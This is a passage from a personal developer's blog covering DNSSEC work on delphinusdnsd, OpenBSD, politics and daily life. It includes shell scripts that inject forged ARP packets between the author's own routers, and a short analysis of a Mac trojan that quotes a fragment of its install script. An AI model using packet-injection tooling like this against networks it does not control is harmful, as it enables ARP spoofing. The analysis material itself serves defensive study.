else, we all die, so then that stewardship is dissolved. The land belongs to
noone the people and their visions are the stewards of the land, and a slight
discrepancy in numbers (4%!) doesn't affect the main core! What's happening
now is disgusting, greed, opportunism, xenophobia, and racism are the signs
coming out of Europe.
We should be above all those things, our waters are
clean to drink giving us health. The land is fruitful giving us food to eat.
What can't we share that to people who have lost it all? And mind you the
uprisings in the fringe nations of the EU are an indirect cause of our
unity. We should feel compelled to help them not close them out.
Profit for the poor!
September 27th, 2015
I have saved a lump some of money over several years. It's more than a little
and too little to gain any attention. However I want to invest it into a
business of Internet
nature. I would do work just before and during this endeavour to make it
work. The big problem that I see is that I don't have enough capital to
start to make it, and I want to do it on my own. I realise that "The Internet"
the medium that promised freedoms to us is only a place where the rich can
make a profit. And that's what's wrong with it. It is _the_ motor that
makes the rich richer and the poor poorer because poor are just supposed to
give money to the rich on the Internet and no opportunity for small business
is granted. Correct me if I'm wrong.
Wrote a donation to OpenBSD
September 30th, 2015
Yes it's donation time again. I have written the transaction and will be
bringing it to the bank friday the 9th of october or thereabouts. It's
only 50 euros so nothing much to get excited about. But every tidbit helps.
This brings the total donations this year to 200 euros, I think.
Pre-ordered Tears of Luv Album
October 1st, 2015
The artist: Anthony B The album: Tears of Luv The release date: October 16th
Happy Birthday M.
October 2nd, 2015
I know you probably won't read this but here is a try anyhow. May the walks
of life guide you back to us.
For God's sake! Stoererhaftung is in the Way!
October 3rd, 2015
In Germany there is a law preventing people from opening their access point to
anyone in the public. It's called the Stoererhaftung (in german) which
translates to the two words "Stoer" which means disrupt and "haftung" which
means accountability.
We have a situation now that is of national significance. We have a lot of
refugees that are flooding first contact centers. The refugees are in dire
need of Internet to keep touch with their families. After food, clothing,
shelter and security Internet is the next needed thing for them.
The german government has denied Internet access to refugees for a period up
to two years, which is the word from someone I got to know through a mailing
list. She works with the refugees. People and groups are helping providing
Internet by using the Freifunk infrastructure which bypasses the legal
situation with the Stoererhaftung. It's not ideal because the resources of
Freifunk groups is limited.
While Freifunk is happy now that we're seeing real user numbers on our stats,
I worry about the long term effects half a year down the line. We need to
offload. And the only correct way is to offload the Stoererhaftung. We
fought the government on this before, and to put it bluntly the government
is the reason that we're dumped on with refugees looking for Internet.
Getting rid of the Stoererhaftung would allow us to make operations cheaper as
traffic would come from inside Germany, it would make everything sustainable.
This is a classic case where a law designed by government is causing people in
need to suffer.
I expect from the german government to immediately do everything in their
powers to help the humanitarian crisis that our refugees are facing. Look no
further but the Stoererhaftung it's a law that is disruptive in all respects.
Happy Birthday R.
October 3rd, 2015
And everyone who is born on this day, happy birthday!
Autumn Programmer
October 7th, 2015
I took this picture yesterday I thought I'd share it.
Today the leaves on the maple are even more brilliant and red. It's a nice
sight. Soon they'll fall I'm sure.
OpenBSD 5.8 poster arrived
October 7th, 2015
This means the CD is on its way as well. I now have posters of a lot of
researchers when you look at the OpenBSD poster and the poster beside it
of the over-wintering expedition of Concordia station in Antarctica.
Yes my office is colourful, if you look close you'll see some fud on the
planets poster above the monitor but I don't think you can see that in detail.
Status update on Delphinusdnsd
October 10th, 2015
This morning I finished 4 needed DNSSEC RR's for ANY replies. Since the code
for ANY and AXFR is in parts the same this finished AXFR's as well. I'm now
about a month away from release and I don't think I'll make it. I have a
one week vacation before the month changes to november and I need to write
the frontend ruby code to dns sign the delphinusdnsd zones. If I get
finished it will be untested for release and if I test it it may take until
new years to release. I'll keep hacking on it (I have monday off), and I'm
refreshing myself with ruby right now on this weekend (got the ruby book beside
me).
Yesterday OpenBSD 5.8 arrived
October 11th, 2015
I got the 3 magic discs of freedom! Thanks to all involved!
Upgraded supercluster
October 17th, 2015
Along with every other host on my network I have upgraded supercluster.
If you see any breakage let me know. I'll fix it.
Luna-27
October 19th, 2015
I'm thrilled that Europe wants to put personell on the moon.
Oct 21, 2015 Cars that fly?
October 20th, 2015
Tomorrow is back to the future day. On this day in part 2 of the trilogy
Marty McFly travels to Oct 21, 2015, in essence tomorrow. Cars that fly?
More like cars that lie, if you look at the VW emissions scandal. We did
not get the hologram projectors nor the hoverboards. But we had something
in common, cars still exist in 2015.
Thanks to Chris who gave me a ride in his deLorean one day when I was in grade
10 or 11. That really rocked! Did we timetravel?
MPS open sourced
October 22th, 2015
Almost two years after I wrote this with help of Rienzilla I'm releasing it
to the public. The sources are found
here enjoy.
Open Sourced CodeBlue version 1
October 24th, 2015
After 14 years of having this program (mostly) for myself, I think it's worth
it to Open Source it. Successes of Code Blue are
proving a bug in someones program
proving a bug in the OpenBSD kernel which caused a crash after a CBv1 typo
proving that ARP packets get lost on AVM routers (recently)
There was many other cases that I used codeblue for good. It's not an evil
program. Sources are here
. Codeblue was based on gppf in idea but not in code.
AVM FritzBox Router losing ARP packets
October 26th, 2015
After a 2 month long debug session with my gear I finally produced a workaround
with codeblue to _fix_ the situation.
The problem: between my routers gamma and uranus (both OpenBSD) arp
gets lost either on the FritzBox or a FritzRepeater from the same manufacturer
(AVM).
The solution check if a threshold of arp cache timeout has been reached
and populate the arpcache manually with an injected arp packet.
Here is the scripts I've written. On uranus:
#!/bin/sh
# this script checks if ARP was lost between gamma and uranus via AVM AP
# if so it will mail me and send a gratuitious arp to restore the arp cache
# on gamma it will do it twice to escape stupid filtering on AVM fritzbox.
sleep 10
CACHE=`ssh watcharp@192.168.179.1 /usr/sbin/arp -na |\
awk '/192.168.179.10/ { a = split($4, b, "m"); print b[1];}'`
if [ $CACHE -lt 15 ]; then
echo "cache is at $CACHE going to set arp manually" | \
mail -s "arp timeout" emailat@centroid.eu
/usr/local/bin/cb -a is-at -s192.168.179.10 -d192.168.179.1
sleep 20
/usr/local/bin/cb -a is-at -s192.168.179.10 -d192.168.179.1
fi
exit 0
And then on gamma:
#!/bin/sh
/usr/local/bin/cb -l re1 -a who-has -s00:0d:b9:XX:XX:XX,192.168.179.1 \
-dff:ff:ff:ff:ff:ff,192.168.179.10
With these scripts I am willing to bet my problems go away.
Outlook Delphinusdnsd 1.0.0 not before XMAS
October 27th, 2015
I'm getting stalled with development of delphinusdnsd and distracted. I should
have been coding on this yesterday to make use of my full vacation for this but
I decided to soak up lazyness instead. It's ok though, there is no way I can
do this in two weeks, if I do then there would be little testing if any.
pledge(2) Don't do this!
October 31st, 2015
pledge(2) in OpenBSD is a whitelist of system calls that a programmer pledges
/ promises his program will conform to. If they lie the kernel will kill the
program. If you look at this from an attacker perspective you'll have to
restrict bytecode or whatever your edge is to the pledged spectrum of syscalls.
I'll give you another example. If you have an anti-virus mechanism that scans
emails or programs it may not need to talk Internet protocols and thus if
someone manages to buffer overflow the scan process and have it open a socket
back to the attacker aka a bindshell, pledge will stop the socket call before
the kernel opens it. It's ingenious and it gets better. As you know your
program you can pledge several times to restrict more and more of it over
the course of the program flow.
In private conversation I offered Theo de Raadt, the principal programmer around
pledge, an awk program that rudamentally scans C sources to determine a base
pledge in a program. What I got back was a response I didn't expect. So I'm
giving out a warning to people to NOT DO AS I had done. I still think I'm not
going to be the only one who writes such a program since my gift to deraadt
was not done publically.
You see in computer science you study the code, then you UNDERSTAND the code
and then you can add to it. What I did was pseudo-science, since I didn't
need to understand the code. Understanding is a big problem with code in
general as everyone has their own style within the allowed programming idioms
of C. Not understanding code means you can't contribute to it. I personally
did not understand BIND code so I decided to write my own nameserver, the
result was something I understood because I wrote it without wasting my time
going into libraries that criss-crossed all over the source tree. However
my code grew past 10,000 lines and it's easy to lose track of some areas.
My memory is not the best I think it's short span so I try to work with tools
that easen this. However let's get back to science. As shown by the
commits of top the programmers who pledged it not only screwed up once but
twice and failed to understand top. So now we're accusing each other of
pseudo-science and not understanding the code right. Let's put that away,
as it's counter-productive. However I'd like to warn people of suggesting to
OpenBSD what I had done. So know your code, apply pledge and stay safe.
For me pledge doesn't work as shm*(4) routines don't have a pledge keyword,
so I'll have to wait. Anyone else wanting to pledge a program linked against
db4 will have to do the same.
And lastly I'll say I was a bit hurt by deraadt's words, but I'm not gonna
repeat them in public. I'll still stay loyal to OpenBSD despite this.
Donated to OpenBSDFoundation
November 4th, 2015
I have given the OpenBSD foundation 41.81 EUR which was in my paypal account.
I usually donate directly to deraadt but I wanted to rid the money I had in
my paypal account so it goes to the foundation this time.
swshell.de is DNSSEC enabled now
November 8th, 2015
Since yesterday swshell.de is DNSSEC enabled. I finished the zone signing
utility for delphinusdnsd which is called dd-convert.rb. That utility leans
on BIND tools. One day perhaps I'll make my own. I have checked with the
DNSSEC debugger
and everything seems to be in the green, but I have to figure out what I did
first to do so and play a little with tools. Also delphinusdnsd would need
a good debugging now so that it gives quality answers.
Happy Anniversary Delphinusdnsd!
November 8th, 2015
Even though I checked in the sources on November 29th, 2005 I must have been
writing on Delphinusdnsd before that, so November is anniversary month!
Guess what this daemon of mine is 10 years old! It does DNSSEC now too!
So in my experience it takes a part-timer 10 man-years to reach DNSSEC. And
I had a lot of spare time when I wasn't programming on this server. I have
recieved lots of support mainly out of eastern Europe for this server. I
don't quite know why that is, but thanks to you for using my server, and for
inquiring about it and a big thanks to those that sent patches. Thanks also
goes to #unixhelp for hearing my worries, visions and dreams about this DNS
server. Thanks for putting up with me! The first non-beta version of this
server will likely be released around new years 2016. I'm just doing tests
right now with swshell.de comparing it to BIND and keeping and eye out for
faults. So what is next with this server? I plan on doing DANE support
for it but then I think I'm gonna focus on bug fixing, dunno. There is
always room for some newbie to come along to write on this. An easy task
would be HINFO support. Cheers!
Delphinusdnsd does TLSA RR and thus DANE
November 10th, 2015
I hammered the support out this morning within 1.5 hours, probably a record
for me. But I based it off SSHFP RR's support which has only 1 8 bit integer
less in the answer, so it was fairly easy to convert.
I have asked Luke Antins if I can pay him a bit more for the TLSA support
in his dns-zone ruby gem. If he is willing to do it, I'll be able to play
with DANE as I haven't been able to sign the TLSA yet and thus that part is
not tested yet.
These are interesting days for sure.
Purchased Reggae
November 13th, 2015
Yesterday I purchased the Faithful Riddim of various artists. I liked the
"topic of the day" song by I Octane on youtube which made me get this. Also
got "Trod on" by Devano single. Too bad Devano hasn't got an album on iTunes.
I read this book in grade nine. Also the sequel to it "the guardian of isis". These
have nothing to do with ISIS that we hear about in the news today. These books
were very well written IMO and were good science fiction. Something to dream
about.
10 years Delphinusdnsd in 9 days
November 20th, 2015
It's here in 9 days. The anniversary when I can prove when I checked in the
sources to the then-called wildcarddnsd. 10 years! And my server is like an
arrogant little child still! Nothing like bind which is probably 17 years
old now.
10 Years
November 29th, 2015
Today is the 10 year anniversary of delphinusdnsd. DNS to me has always been
appealing, from vanity domain names on IRC to managing DNS as a hostmaster
(system administrator). I wanted a deep understanding of DNS further than
just being a hostmaster so I decided to keep working on this. At first it
was just a stupid little turnkey program, but I got to like it so much that
I continued to put my efforts into it. I'm doing DNSSEC with it now. That's
a major feature. I plan to release the first major release in january 2016
which drifts off the new years date. Oh well, cheers!
23 days until the December Solstice
November 29th, 2015
It's 23 more days until we enter winter in the northern hemisphere. The
southern hemisphere enters summer such it is properly called the "december"
solstice and not winter solstice. There is probably other names but I'm
going to stick to december solstice. Its date is december 22, 2015.
What happens when...
December 1st, 2015
I tried to make two zones on two DNSSEC enabled nameservers. One being
io.solarscale.de which is delphinusdnsd and the other americas.centroid.eu,
which is BIND. I was interested how the servers would behave with one signed
zone and one unsigned zone. And the result was staggering. There was almost
no difference between the BIND and the delphinusdnsd. Both however reply
with the DO bit set on the unsigned zone, which is possibly wrong. The
signed zone is swshell.de and the unsigned zone is black.solarscale.de. Well
it was worth the experiment and my code was forgiving.
Anonymity
December 3rd, 2015
In this article from heise
online (german), politicians cry out about anonymity. In this case they're
right IMO. However I see the problem different. Right now the "end-user" is
given a dynamic IP address which is to "guarantee" them their anonymity. Yet
the provider knows who they are, and google as well as other large networks
who can correlate big data or logins to match someone. Also an end-user today
must use IMAP or POP3 or webmail to a server on the internet to fetch their
mail. Pretend it were different. Pretend everyone was given a static IP.
Everyone now theoretically knows who this person is. Google would not care
because they already knew anyhow, but you may see its market share go down
because they don't guard a secret anymore. Also people would be able to
get their mail via SMTP instead of IMAP/POP3 meaning mail is not stored on a
3rd party server. This is positive. A person with a static IP can run any
services they like and become a server in this sense. This means that someone
can have friends using their computer too, but if any of those friends betray
the trust and invite a police visit, the friendship may be endangered. Who
has taken the blame for things their friends did? I for one did once. But
that was the last time. If you're a known troll for something your friends
did from your computer it'd be very hard to repair that reputation, but that's
the idea behind fixing this anonymity. So let's all be open and have static
IP's is my idea.
Trying to run letsencrypt beta
December 5th, 2015
Well I tried to get the free https certificate with letsencrypt tonight:
19 ./letsencrypt-auto certonly --manual --email letsencrypt99@centroid.eu \
--agree-tos -d centroid.eu
id.eu --agree-tos -d centroid.eu <
Updating letsencrypt and virtual environment dependencies.......
Running with virtualenv: sudo /home/pjpxx/.local/share/letsencrypt/bin/letsencrypt\
certonly --manual --email letsencrypt99@centroid.eu --agree-tos -d centroid.eu
We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:
#1) Respect the privacy of others.
#2) Think before you type.
#3) With great power comes great responsibility.
Password:
Ugh no! I will not run this as root. This utility will need a fix for that
before I run this again. Too bad!
Thinking of getting a third Internet Link
December 7th, 2015
I'm thinking of getting this cable Internet thing in the New Year. The german
Telekom is slow in rolling out their VDSL in town so I'm thinking of going
with RegioNet which is the citys own Internet company. Thinking of 50 Mbit/s.
Reggae
December 11th, 2015
I purchased the album "Legacy - an acoustic tribute to Peter Tosh", which is
performed mostly by his son, Andrew, I suspect. Because I don't have many
Wailers songs this will be a good addition to my music collection. Reggae
music is wide-spread in spectrum but this goes to the root. Happy listening.
100 million X speedup from classical computer
December 11th, 2015
Google and NASA recently were in the news regarding their shared Quantum
computer. They said that certain operations
yielded a speedup of 100 million times what a classical computer can do.
To put this into perspective. With 1 billion dollars you could buy 100 of
these D-Wave computers which cost 10 million a pop. And those 100 would then
have a distributed speedup of 10 billion times that of 1 classical computer.
All that it leaves to question is .. what algorithms are capable of being
run at that speed? If it's Shor's algorithm I think we can kiss our crypto
safety goodbye. An SSH or TLS session would then be decipherable as it is
an RSA Hybrid.
What was the "black-budget" of the USA again?
An ejection from Atacama?
December 13th, 2015
In this
article phys.org reports that the country Chile is planning a hydro power
plant in the Atacama desert. While this is applaudable there is European
interests in the region that may conflict with this. Several ESOC telescopes
are situated there and
exploit the fact that the Atacama desert is nearly cloudless. Would water
in that desert create cloud? Only time will tell. We may have to look
for a new place for the southern observatories, or move it all to the moon.
If that's even possible in the near future.
More sky photos coming up
December 15th, 2015
I was talking with my Dad who is getting a new camera. So I'll inherit his
old one. It was the one that I took sky photos of Mars on February 7th, 2010
of (seen here).
it's 6 years later and this camera is probably 2 generations old by now but
I won't use it all the time, only sometimes. I'm especially interested in
getting more of Delphinus constellation with it's stars Rotanev and
Sualocin (both are backwards from
Nicolaus Venator) who apparently had a liking for the constellation Delphinus as well.
Oh well here's to hoping it works out.
Getting ready for delphinusdnsd release
December 19th, 2015
I'm now running some of the latest code in production for the next two weeks
on my nameservers io.solarscale.de and omega.virgostar.net. If I'm satisfied
I will release delphinusdnsd 1.0.0 by January 1st, 2016. It's been a long
year and I was very very brave for attempting DNSSEC. There is room for
improvement but a simple DNSSEC'ed zone can be served by delphinusdnsd.
After that I'm probably gonna take a (small) break from DNS programming.
Happy Solstice
December 21st, 2015
Tomorrow is solstice in the very early morning hours, iirc. So when I wake up
it'll be winter officially. Happy (december/northern) Solstice!
I joined Twitter
December 22nd, 2015
There is a lot of fake accounts out there pretending to be mine. But the
official twitter account from me is now @delphinusdns_pt Peter J. Philipp.
I'll be dropping news on delphinusdnsd here and do personal correspondence
between old and new friends of mine.
Merry Christmas
December 23rd, 2015
I may not get the chance tomorrow to wish you a merry christmas so this is it.
Merry Christmas!
2015 Year in Review
December 29th, 2015
December 23, 2015 Merry Christmas
December 22, 2015 I joined Twitter
December 21, 2015 Happy Solstice
December 19, 2015 Getting ready for delphinusdnsd release
December 15, 2015 More sky photos coming up
December 13, 2015 An ejection from Atacama?
December 11, 2015 100 million X speedup from classical computer
December 7, 2015 Thinking of getting a third Internet Link
December 5, 2015 Trying to run letsencrypt beta
December 3, 2015 Anonymity
December 1, 2015 What happens when...
November 29, 2015 23 days until the December Solstice
November 29, 2015 10 Years
November 20, 2015 10 years Delphinusdnsd in 9 days
November 18, 2015 Keeper of the Isis Light
November 13, 2015 DNSSEC validation tools
November 10, 2015 Delphinusdnsd does TLSA RR and thus DANE
November 8, 2015 Happy Anniversary Delphinusdnsd!
November 8, 2015 swshell.de is DNSSEC enabled now
November 4, 2015 Donated to OpenBSDFoundation
October 31, 2015 pledge(2) Don't do this!
October 27, 2015 Outlook Delphinusdnsd 1.0.0 not before XMAS
October 26, 2015 AVM FritzBox Router losing ARP packets
October 24, 2015 Open Sourced CodeBlue version 1
October 22, 2015 MPS open sourced
October 20, 2015 Oct 21, 2015 Cars that fly?
October 19, 2015 Luna-27
October 17, 2015 Upgraded supercluster
October 11, 2015 Yesterday OpenBSD 5.8 arrived
October 10, 2015 Status update on Delphinusdnsd
October 7, 2015 OpenBSD 5.8 poster arrived
October 7, 2015 Autumn Programmer
October 3, 2015 Happy Birthday R.
October 3, 2015 For God's sake! Stoererhaftung is in the Way!
October 2, 2015 Happy Birthday M.
September 30, 2015 Wrote a donation to OpenBSD
September 27, 2015 Profit for the poor!
September 26, 2015 European Union where is your strength?
September 23, 2015 Happy September Equinox!
September 15, 2015 I'm not hiring
September 10, 2015 Equinox in less than 2 Weeks
September 5, 2015 Delphinusdnsd now answers to version queries
September 5, 2015 The last homely house on Earth
August 31, 2015 Changed DNS setup
August 29, 2015 Cancelling io.solarscale.de, eventually
August 27, 2015 Resisting Refugees is Shameful
August 26, 2015 Omega: a new VPS
August 22, 2015 Changes at work
August 21, 2015 Maxed my Soekris 6501
August 19, 2015 OpenBSD 5.8 Pre-orders are on
August 17, 2015 And still in the Rush
August 16, 2015 Still in a Consumer Rush
August 10, 2015 I started shuffling my $HOME/.ssh directory
August 9, 2015 Spampd and taking the -T out
August 9, 2015 Ordered a Book from Amazon
August 2, 2015 CryptoBooks virtualized
July 28, 2015 Delphinusdnsd status update
July 27, 2015 Opinion: Hacking Team are pigs
July 25, 2015 Two CryptoBooks side by side
July 24, 2015 New Network Plans
July 23, 2015 Macbook Pro and things
July 17, 2015 My CryptoBook
July 15, 2015 Donated $15 to FreeBSD Foundation
July 13, 2015 Purchased Netbook
July 10, 2015 Status update of Delphinusdnsd and DNSSEC
July 10, 2015 Hand-Down and a Story
July 9, 2015 Signatures of Time - Double Play
July 7, 2015 Freifunk was affected by an MTU issue
July 6, 2015 It definatly was hotter than 2003
July 4, 2015 Power outtage this morning
July 3, 2015 I have donated 20 euros to the Greece bailout fund
June 28, 2015 AKW Grafenrheinfeld has shut down over night
June 28, 2015 Status update on Delphinusdnsd and DNSSEC
June 25, 2015 RFC 4034 compliant AFAIK
June 25, 2015 Donated 50 euros to OpenBSD
June 24, 2015 Vacation cut short
June 23, 2015 Art display of my parents creations
June 22, 2015 Delphinusdns Project sponsors Luke Antins
June 22, 2015 Donated 150 euros to the Red Cross
June 21, 2015 Happy Solstice
June 20, 2015 The First Ever DNSSEC answer from Delphinusdnsd
June 18, 2015 Delphinusdnsd Hack days, entering production..
June 13, 2015 I'm on Vacation
June 6, 2015 Purchased two Books
June 5, 2015 Vacation in a week
May 22, 2015 Computers are better Rappers? Perhaps...
May 21, 2015 Advocacy for OpenBSD
May 21, 2015 My udptunnel program is open source now
May 19, 2015 Holidays less than a month away
May 15, 2015 OpenBSD 5.7 arrived
May 15, 2015 Freifunk Tunnel Masters
May 13, 2015 Anexit
May 12, 2015 Donated 25 euros toward Nepal
May 12, 2015 Purchased DJ mixer
May 9, 2015 Where do you get your clothes?
May 8, 2015 Pension, TV and Books
May 2, 2015 OpenBSD CD's delayed, upgraded anyways
April 30, 2015 Httpd died overnight
April 29, 2015 Goodbye Avon!
April 28, 2015 OpenBSD getting hammerfs through GSOC?
April 24, 2015 Happy 25th anniversary Hubble!
April 24, 2015 And the Park seemed inviting
April 22, 2015 Donated 50 euros to OpenBSD
April 22, 2015 Bought two singles
April 22, 2015 Vernal Equinox and Jesus
April 21, 2015 Exploring Xephem
April 20, 2015 Backport of patch for OpenSMTPD 5.4.2p1
April 15, 2015 The contraction of my VPS network
April 15, 2015 Blog Outtage this Morning
April 13, 2015 One year of mercury (computer)
April 11, 2015 Sorry no Linkedin, yet
April 11, 2015 Mac OS X 10.10.3 killed my screensaver!
April 9, 2015 Wildcarddnsd 0.9.1
April 7, 2015 Greece's war reparation demand
April 4, 2015 Happy Easter
April 1, 2015 Astronomers detect a giant star in Constellation Pisces
March 31, 2015 ESA what are your plans?
March 30, 2015 R.I.P. Paul Schenkeveld
March 29, 2015 Please, not another LEO ISS!
March 28, 2015 The catch-22 of mental illness
March 21, 2015 My Eclipse photos were a FAIL
March 14, 2015 Happy Pi day
March 13, 2015 Pre-Ordered OpenBSD 5.7
March 12, 2015 Wrote two members of parliament
March 12, 2015 Equinox in 8 days
March 7, 2015 Crackers are getting more careful
March 5, 2015 Oldlaptop's github repo
March 5, 2015 OpenBSD's httpd with webalizer
March 5, 2015 Softraid Crypto seems secure
February 27, 2015 God Speed Spock!
February 26, 2015 OpenBSD donations reached 397,000 dollars in 2014
February 25, 2015 Got a washing machine
February 24, 2015 Nearing 20 years UNIX experience
February 23, 2015 Ordered three books
February 21, 2015 Scarcity vs. Abundance
February 16, 2015 Moved the blog
February 14, 2015 Upper Lower Class
February 13, 2015 I'm sick
February 6, 2015 Next Week marks Two Years in My Apartment
February 5, 2015 Thinking of voting Die Linke in 2017
February 5, 2015 The last frontier, under the ice
February 3, 2015 Why I think "The Time Machine" doesn't work in reality
February 2, 2015 I want a Greek bailout
January 28, 2015 The rich can't buy smarts, can they?
January 27, 2015 Electricity (day) consumption up (unfortunately)
January 26, 2015 Cryptowars: Organised Crime and Terrorists
January 24, 2015 Administrivia
January 24, 2015 Is it more than Space Junk?
January 19, 2015 This is how fair the world is
January 13, 2015 And our rights diminish
January 11, 2015 I am not your subordinate
January 9, 2015 Ordered 3 books
January 5, 2015 My 150 Euro Calculator
January 5, 2015 Donation time again
December 31, 2014 Happy New Year!
December 29, 2014 Added supercluster to nameservers
December 28, 2014 Winter Flowers
December 24, 2014 Merry Christmas / Frohe Weihnachten!
December 17, 2014 NASA wants to go to Venus
December 16, 2014 My thought about Pegida
December 16, 2014 A domain expired, amdeutschhof.de
December 15, 2014 December solstice in less than a week!
December 12, 2014 Comparison between Mordor and the US
December 9, 2014 Farewell American Forces
December 8, 2014 Speak German at home...
December 6, 2014 When Fighters scramble
Our XMAS Dinner
December 29th, 2015
More power from Arabia and Sahara?
December 31st, 2015
A ghost haunts Europe. It's the power ghost. Once there is no more oil
either available or sanctioned due to the environmental effects, where will
we get our power from? One corporation in Germany
has a plan.
But do we really want to upkeep the power hegemony in Arabia and Sahara just
to get our power? These are political factors which don't convince the
technical ones.
Delphinusdnsd 1.0.0 Released
January 1st, 2016
I have released delphinusdnsd 1.0.0. You can download it here. The SHA256 code to the tarball looks
like this: 8914aa55437081e44895a4cecdfff82b4a3be03fb38dd65d073c71e1be187e41.
I've worked on this release for over a year. Some parts are incomplete still
but I feel I gotta get it out the door. When is a DNS server ever complete
though one may ask? Anyhow, enjoy!
When a book loses significance
January 1st, 2016
It's 2016. The following book has lost its significance.
This is the third edition of DNS and BIND, and it doesn't cover bind9 and it
doesn't cover DNSSEC. However this book guided me for a while when I was
writing on delphinusdnsd prior to writing the DNSSEC code. I can only put this
book back into my bookshelf because it looks good. But that's about it.
I would recommend the authors works to anyone, they are written in an easy
to understand fashion. Just don't get an old book like this one :-).
How hard can changing a password be?
January 1st, 2016
In my network which consists of 1 access point and 2 repeaters to create
a WLAN bridge between 3 routers, I tried to change the Wifi password.
Simple, I thought. I'd start with the repeater furthest away from me and
change its WLAN password, then do the same on the access point and the same
for the repeater closest to me. Was I in for a mental boxing match where I
did not win. The repeaters decided they did not want to accept the access
point because somehow I had WPS set to active, or was that it? Or was it the
"hidden" link to find which station to connect to which had a password of its
own. I still don't know what I did exactly to make these repeaters finally
connect to my AP. On top of that they changed their IP's and I had to re-
configure my router to even connect to them. Talk about making a function
hard, when it should be as simple as changing a light bulb! No kudos go
to AVM with their Fritz line of Access points and Repeaters. They still
owe me one regardless, due to losing ARP packets on their AP. Why did I
ever invest into crap?
The invisible man
January 3rd, 2016
Have you ever wanted to go offline for good? No Internet for the NSA to track
you. No online marketing. No email, and in my case no job. Believe it or
not I went offline for about a year in 2001. I was misinformed when 9/11
happened, having only an FM radio to get my information. But imagine if an
offline life was manageable. Can we do this at all? Make my workstations
PC's again. Meaning it really is a personal computer and not a cloud
extension. I'm interested in organizations who facilitate an offline life.
Would I take the leap?
Donation time
January 6th, 2016
I have donated 100 euros to Theo de Raadt and OpenBSD. He'll have to get me
really angry for me to donate to the foundation and even more angry for me to
not donate, lol.
Organized Crime is the Enemy
January 8th, 2016
When you think of safety, you are naive to think you'll get it anywhere after
the sun goes down. Be smart, don't put yourself in situations where you're
defenseless, avoid hotspots. In Cologne ruthless gangs of organized criminals
roamed the train station on new years eve. The police were helpless, due to
being outnumbered. One may now think of how to bring the individuals to
justice, and face recognition technology comes to mind. Where will it end
us up though? In a totalitarian society where everyones face is recognized
in real time?
One thing to remember is that it was organized crime that
terrorized the few women and men who were rather defenseless. But the herd of
sheep now know the wolf is about, and we need to think of ways to protect
ourselves. For one, strong cryptography in voice and data is needed, and
should not be backdoored. When organized crime does things they do it big and
they want to get at the next victims online banking. Be smart, keep the
crypto strong it is a foundation, a pillar for fighting the evil in society
who group up. We know the wolf exists now and isn't just a fable. We need
the right tools to combat him while keeping our society with it's laws and
freedoms intact and sturdy.
Dissecting WebShoppy Mac OS X trojan
January 9th, 2016
My dad got a virus on his Mac (Snow Leopard OS X I think). Before we
reinstalled it with El Capitan I saved the binary, the install script, and
an lsof output of this trojan called WebShoppy.
First unpack my tarball I made, first impressions are that there is a
._3166.sh file that was copied along with the 3166.sh script when I made
the tarball, possibly a trait of the virus.
alpha$ tar -xvzf ws.tgz
ws
ws/._3166.sh
ws/3166.sh
ws/list.open
ws/WebShoppy
let's take a look at this ._3166.sh file it seems to be binary code so I'm
going to hexdump it.
Next I will show you parts of the 3166.sh script which was placed in the $HOME
of my dad's user.
...
# existing check
brands=(flashmall webshoppers webshoppy smartshoppy)
brandExists=false
for currBrand in "${brands[@]}"; do
if [ `pgrep -i $currBrand | wc -l` -gt 0 ]; then
brandExists=$currBrand
fi
done
...
Here it checks for the following programs already running on this computer.
However it clobbers brandExists if multiple instances of these four programs
exist.
it will then try to add what is a crontab like entry (launchctl). So it
registers itself into the system to always start up every boot.
plist_user is $HOME/Library/LaunchAgents/com.WebShoppy.agent.plist in the
scripts case.
On to the binary, What I found interesting was the content was encrypted, but
strings on mac os x doesn't list all printable symbols, so on OpenBSD I was
able to see who compiled this binary from environment variables packed into the
binary. Chances are it's someone who had their computer hijacked.
It doesn't seem to be doing too much. Perhaps it does things on a timer basis.
If anyone has hints on how I could have done the analysis or post-analysis any
better let me know.
To Human Artificial Systems
January 19th, 2016
Money markets are mainly artificial. They exist only in our minds, with
consequences on the body when there is a lack of resources. Let me say this.
Would the stock market collapse when a star in the center of the galaxy
collides with a black hole? No. Why not??? We have a brilliant way to look
beyond the earth's (who we think we've conquered) hemisphere to the stars.
Just because we are shielded does not exclude us from events happening in our
cosmic neighbourhood. We need to include some reality with our artificial
systems. Don't get me started on the price of oil either.
Preparing to sign my zones -> DNSSEC
January 20th, 2016
I still haven't signed the rest of my zones. I will do that in the next
coming days and see if it works. I hope so. Delphinusdnsd is capable I think.
Noone is downloading it yet though, dunno why.
What's up or down with the Canadian Dollar?
January 21st, 2016
About three months ago I was exchanging my canadian pay and I was getting
what was reasonable money back. Today I'd be getting 144 Euros less. That
doesn't seem reasonable. I am still patient but patience is running thin,
I may have to re-negotiate my work contract to be paid in a more stable
currency.
Delphinusdnsd - ironing out the DNSSEC bugs
January 22nd, 2016
I have started signing my personal zones. I'm the only one using them with
my family so I can do this. I ran into some trouble yesterday and today
with DNSSEC replies. Also reply_mx() in delphinusdnsd didn't like DNSSEC.
I have stripped out the offending code but I'm gonna have to revisit it.
For anyone who is trying to run this wait for the 1.0.1 release which will
come out soon or use tonights snapshot from -current (midnight CEST) to get
the MX and NSEC3 fix. Sorry if anyone was bit by this, but I only had 1
DNSSEC test zone, and several zones are now unearthing bugs. I have my
weekend planned for writing on this.
All Domain Names signed
January 23rd, 2016
This morning I did the last one of all my domains. Now I sit back and
wait for problems to arise. I already did all the online validators and
they are saying everything is correct. My email still works, which is
the main thing.
Delphinusdnsd 1.0.1 released
January 29th, 2016
Bugfixes from the STABLE_1_0 branch have made the 1.0.1 release. I plan on
doing up to 8 more (to 1.0.9) depending on need, otherwise new code will go
into the -current branch and ultimately into the 1.1.0 release.
Electricity for 2015 way up
February 3rd, 2016
I guess I must have had too many days where I had it too warm in my apartment.
So here is the table for comparison with the previous two years. It feels
a bit fishy but I'll take their word for it.
Year
Night
Day
Total
2013
6941
1276
8217
2014
6906
1323
8229
2015
10151
1452
11603
This is in comparison with an
earlier
article from last year. I'm not gonna fight this outrageous bill but I'm
gonna try to keep a cooler apartment for 2016 since it's mainly the heaters
that made this jump.
Ten days from now is Year Three
February 3rd, 2016
It's been 3 years since I had this apartment. A
look back.
Unfortuantely the electricity bill for 2015 was high, and I had to pay for a
new Fridge. All in all these are 1000 euros of expenses that I didn't
foreplan. But I have the best apartment I ever had and I still have the job
I had when I moved here.
Delphinusdnsd what's next in development?
February 8th, 2016
I want to revisit the signing tool, and possibly do it in C. That or I'm
thinking of incorporating DNSSEC signing right into the daemon. That would
